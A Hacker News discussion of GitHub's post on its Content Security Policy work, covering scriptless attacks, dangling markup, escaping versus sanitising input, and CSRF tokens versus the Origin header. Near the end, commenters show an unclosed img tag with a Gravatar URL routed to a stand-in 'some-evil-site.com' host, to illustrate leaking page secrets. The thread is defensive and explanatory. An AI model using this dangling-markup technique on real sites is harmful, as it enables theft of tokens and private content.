
GitHub's post-CSP journey - eriknstr
https://githubengineering.com/githubs-post-csp-journey/
======
jaredsohn
The article says CSP seven times in the first two paragraphs without saying
what it stands for; it would be much more readable if they did. (It stands for
content security policy for those wondering.)

~~~
dfc
At a certain point you need to set a baseline expectation of your audience in
order to communicate effectively. Do you think they should also explain
exploitation, img-src, the mechanics of parsing unmatched quotes, javascript
or CSRF? The target audience of the article knows what CSP stands for and most
likely has been reading the other entries along this journey.

~~~
peteretep
You are getting downvoted because in complaining we are below your technical
baseline, you've ironically revealed you're not familiar with the rather more
interesting CSP.

~~~
skj
As one of the more prominent gophers out there, dfc is quite familiar with
communicating sequential processes.

That said, I disagree with his original point. I am a regular HN reader and
did not know about content security policy.

~~~
LamaOfRuin
I did already know about content security policy. I still wasn't certain
that's what the article was referring to without reading several paragraphs of
the two articles.

------
niftich
A very detailed post which talks about their collaboration with security
consulting firm Cure53 to identify various fairly novel exfiltration
techniques, and attempt to adjust their Content-Security-Policy or some aspect
of their application to try to mitigate it. This could be a great resource,
and is certainly a valuable 'lessons learned'.

But I was also overwhelmed. There's a quip that security is a losing battle,
but that wasn't my takeaway -- rather, the knowledge space required to develop
and host a web application that accepts user-generated content in a way that
won't leak info apparently everywhere is getting too much for generalist
developers working alone or in small teams.

~~~
chias
They're interesting and often-overlooked techniques, but are not novel. You
can read a more about these sorts of attacks and other similar ones in 2011
writeup "Postcards from the post-XSS world"[0]

[0] [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)

~~~
ptoomey3
Indeed, lcamtuf's article was a reference during this effort and was linked to
in our CSP post last year: [https://githubengineering.com/githubs-csp-
journey/](https://githubengineering.com/githubs-csp-journey/)

------
jerf
Tone: I assume GitHub knows what they are doing, and I ask this question
because I have a hole in my understanding that I have a professional interest
in making sure is filled, not because I'm trying to "gotcha!" anybody or be
critical. This article clearly demonstrates they are trying hard and not
ignorant.

I don't understand why so much of this article is talking about dangling
markup? While I highly recommend using the highest quality library you can get
your hands on for this task, cleaning up user-supplied markup to at least be
valid HTML is generally not that difficult. Cleaning up every last vector
within that valid HTML is much harder and much more subtle; I have fought that
fight myself, so I understand the bits about how awful the <plaintext> tag can
be and so forth (and how how many other vectors there are for javascript, and
how many vectors there are for loading content you didn't want loaded, and how
many vectors there are for subtle leaks of information, etc., even within
syntactically-valid HTML). But making syntactically-invalid HTML into
syntactically-valid HTML that is at least not "dangling" is not that hard, and
can be done reliably.

So I assume I'm missing some sort of context here about why they are having so
much trouble with this? What's the context where they can't run this sort of
syntax cleaner over the user input?

~~~
ptoomey3
Yeah, the missing context is that we are talking about vectors where GitHub
would not be sanitizing the input correctly. In other words, vectors that
traditionally resulted in XSS. We do exactly as you say in places where we
expect user controlled input. For example, all issue/pull request comments are
Markdown. And, for security, we go to great lengths to ensure that we only
accept a subset of HTML that is safe AND that the resulting HTML is well
formed. But, as history has shown, XSS is more or less unavoidable. There are
just too many places where it can occur for any application to 100% avoid it.
This is at the heart of CSP. Given that history has shown that XSS was
unavoidable, the idea was to add a browser feature as a second line of
defense. So, the article is written from the perspective that traditional XSS
is neutered (the whole "scripting" bit of XSS is gone) using CSP. So, given
that, what might an attacker be able to do without injecting any JavaScript?
This is the origin of "scriptless attacks". Dangling markup is the most
popular technique for exploiting a scriptless attack. So, it isn't that GitHub
would be failing to create well formed HTML. It would be a scenario where an
attacker would traditionally like to have injected a `<script>` tag, but is no
longer able, so they must go to the next best thing...dangling markup.

~~~
tinus_hn
XSS is unavoidable if you think the solution is sanitizing user input.

The solution to sql injection is parametrized query construction, instead of
automatically filtering the ' character and then pasting the template and the
user input together.

Similarly, to avoid cross site scripting you have to combine your templates
and user input by escaping it properly, instead of just concatenating them and
then hoping you can avoid the issues by input 'sanitizing'.

------
tannhaeuser
Awesome article and thumbs up to github.

I'm having great reservations towards CSP however. I think it breaks the web
in a way that wouldn't have been necessary had we been a little bit more
careful about HTML syntax rather than dismissing markup validation as an
obsolete technique back when the vulgar "HTML 5 rocks" campaigns were in full
swing.

CSP spec drafts have been around forever but were never finalized. CSP
basically blocks execution of JavaScript in script tags in content (as opposed
to script in the header), as well as in content handler attributes (onclick
and co.) by disabling those alltogether on a page. This totally breaks page
composibility where you assemble content at the markup stream level from
multiple sources, like, say on every single news aggregation site. The removal
of scoped CSS styles from HTML similarly breaks composition.

From Chrome's Content Security Policy page:

[Blocking inline script] does, however, require you to write your code with a
clean separation between content and behavior (which you should of course do
anyway, right?)

I think this comment is totally clueless wrt. what the Web is about.
"Separation of concerns" is most certainly _not_ a characteristic of the Web,
and never has been.

I'm sorry, but rather than using kludges such as CSP to turning the lights off
with a broad brush, how about fixing HTML and JavaScript in the first place?

(note my comment isn't addressed at github but at web standard comitees)

[1]:
[https://developer.chrome.com/extensions/contentSecurityPolic...](https://developer.chrome.com/extensions/contentSecurityPolicy)

~~~
jerf
"I'm sorry, but rather than using kludges such as CSP to turning the lights
off with a broad brush, how about fixing HTML and JavaScript in the first
place?"

OK... how?

To be clear, I'm asking for an HN-comment level of detail, not a standards-
body level of detail. I can't speak for everyone else on HN but I won't go
over things with a fine-tooth comb, I'll only look at top-level issues.

But I will at least point out that being able to casually float third-party
content into any site that has a weakness to XSS or man-in-the-middle or
vulnerabilities in any _other_ third-party content in the website is pretty
fundamental. The fundamental composition power of the web is too powerful and
it is going to have to be cut back. Some of the obvious solutions like
"whitelisting hashes of valid content" have their own problems, like how a lot
of the scripts being included out there are deliberately not constant and
that's their whole point in the first place.

~~~
tannhaeuser
1\. Defining and using safe JavaScript subsets (in the style of Google's Caja
[3] and AdSafe [4], though probably that ship has sailed and cramming syntax
sugar into JS is the order of the day instead)

2\. Defining and using safe CSS subsets (with countermeasures against click-
jacking/-phishing, and hiding "nose print" etc.) though granted this is
challenging; I had hoped a formal semantics for CSS came along (such as in
[2]) but it didn't

3\. Using HTML-aware template engines (such as [1] but there are maybe lighter
approaches with hard-coded HTML rules as well; disclaimer: my project)

[1]:
[http://sgmljs.net/blog/blog1701.html](http://sgmljs.net/blog/blog1701.html)

[2]:
[https://lmeyerov.github.io/projects/pbrowser/pubfiles/extend...](https://lmeyerov.github.io/projects/pbrowser/pubfiles/extended.pdf)

[3]:
[https://developers.google.com/caja/](https://developers.google.com/caja/)

[4]: [http://www.adsafe.org/](http://www.adsafe.org/)

------
whatnotests
Note: "CSP" = Content-Security-Policy as defined here:
[https://en.wikipedia.org/wiki/Content_Security_Policy](https://en.wikipedia.org/wiki/Content_Security_Policy)

------
steffenweber
If all browsers sent the "Origin" HTTP header [1] with POST requests (such
that web applications could rely on it) then CSRF [2] tokens mentioned in the
article would become obsolete. You'd just have to check whether the "Origin"
header sent by the browser is identical to your scheme + domain name (e.g.
"[https://www.example.com"](https://www.example.com")) and be done. Chrome and
Safari have implemented the "Origin" header long ago but unfortunately Firefox
[3] and Edge [4] have not yet done so.

The "Origin" header is similar to the "Referer" header but never contains the
path or query. Furthermore, CSRF protection requires it only for "POST"
requests (i.e. "GET" requests are unaffected). So there is little incentive
for an option disable it for privacy concerns.

[1] [https://tools.ietf.org/html/rfc6454](https://tools.ietf.org/html/rfc6454)

[2] [https://en.wikipedia.org/wiki/Cross-
site_request_forgery](https://en.wikipedia.org/wiki/Cross-
site_request_forgery)

[3]
[https://bugzilla.mozilla.org/show_bug.cgi?id=446344](https://bugzilla.mozilla.org/show_bug.cgi?id=446344)

[4] [https://developer.microsoft.com/en-us/microsoft-
edge/platfor...](https://developer.microsoft.com/en-us/microsoft-
edge/platform/issues/10482384/) (filed by me)

~~~
ricardobeat
The Origin header is not as good to prevent CSRF since it's a known value. A
CSRF token is a one-time value generated in the server, it's impossible to
guess or get a valid one from the outside.

~~~
steffenweber
CSRF protection is not about attacks from evil clients (you can easily spoof
any header with the HTTP client library of your choice, of course). CSRF
protection is about preventing innocent / well-behaving clients from being
tricked into POSTing some data on behalf of their (logged-in) user.

~~~
ricardobeat
Yes. Forwarding a unique CSRF token from the backend gives you some assurance
that it's a legitimate request, initiated from a pageview within a timeframe.
A header (origin) which always has the same value (the hostname) is inherently
less secure, though I overstated how much in the previous comment.

------
joshschreuder
Can someone explain more about how the Gravatar example would work? How would
the attacker embed a dangling markup on Github.com? If they could do that,
couldn't they just use a standard XSS attack by embedding arbitrary HTML?

~~~
pixdamix
CSP mitigates the risks of XSS attacks.

If you look at :
[https://cspvalidator.org/#url=https://github.com](https://cspvalidator.org/#url=https://github.com)
you'll see that the CSP policy directive defines the origins from which images
can be loaded

    
    
        'self' data: assets-cdn.github.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com *.githubusercontent.com ;
    

Previously, images could have been loaded from additional domains (gravatar)
and could have been used to leak CSRF tokens.

~~~
laurent123456
What I don't understand is how the image URL ends up in a non-closed img src
attribute. They might be getting the URL from a third party:

    
    
      https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
    

But GitHub is the one opening and closing the tag, probably in some kind of
template:

    
    
      <img src="{gravatar_url}">
      <p>secret</p>
    

Which should result in this:

    
    
      <img src="https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f">
      <p>secret</p>
    

and not this:

    
    
      <img src="https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
      <p>secret</p>
    

Any idea why they are getting the latter?

~~~
ptoomey3
Yes, the attack assumes a content injection bug in GitHub.com. The attack is
not using our own gravatar URL generation against us; it is the attacker
crafting an arbitrary URL and using that URL inside of an arbitrary image tag.
The reason for the attacker being "forced" to use a gravatar URL is that it
was one of the very few third-party hosts we previously allowed by our CSP
policy. So, the attack demonstrates how this previously allowed host could be
used to exfiltrate sensitive content if/when an attacker found a way to inject
arbitrary HTML into a page on GitHub.com.

------
mwexler
While I'm not a security expert, seeing the various ways that someone can
steal info from a site even after all the protections GitHub put into place
was fascinating, and does bring back the old concern: if a site as large and
respected as GitHub has to do all this work and still encounters exploits,
what can an average person do who might run ad scripts, a tracking script, and
a few helper scripts from various sites? And how can tools try to put in more
protections for average folks (cough, wordpress)?

If you liked this, btw, worth reading some content from their pentester
[https://cure53.de/](https://cure53.de/) which also had some interesting
findings and links.

------
technion
CSP is more of a landmine than we give it credit for. It tripped up Troy Hunt:

[https://www.troyhunt.com/how-chromes-buggy-content-
security-...](https://www.troyhunt.com/how-chromes-buggy-content-security-
policy-implementation-cost-me-money/)

I had a very similar experience, and I'm still hunting for the specifics of
the browser that caused it in my case.

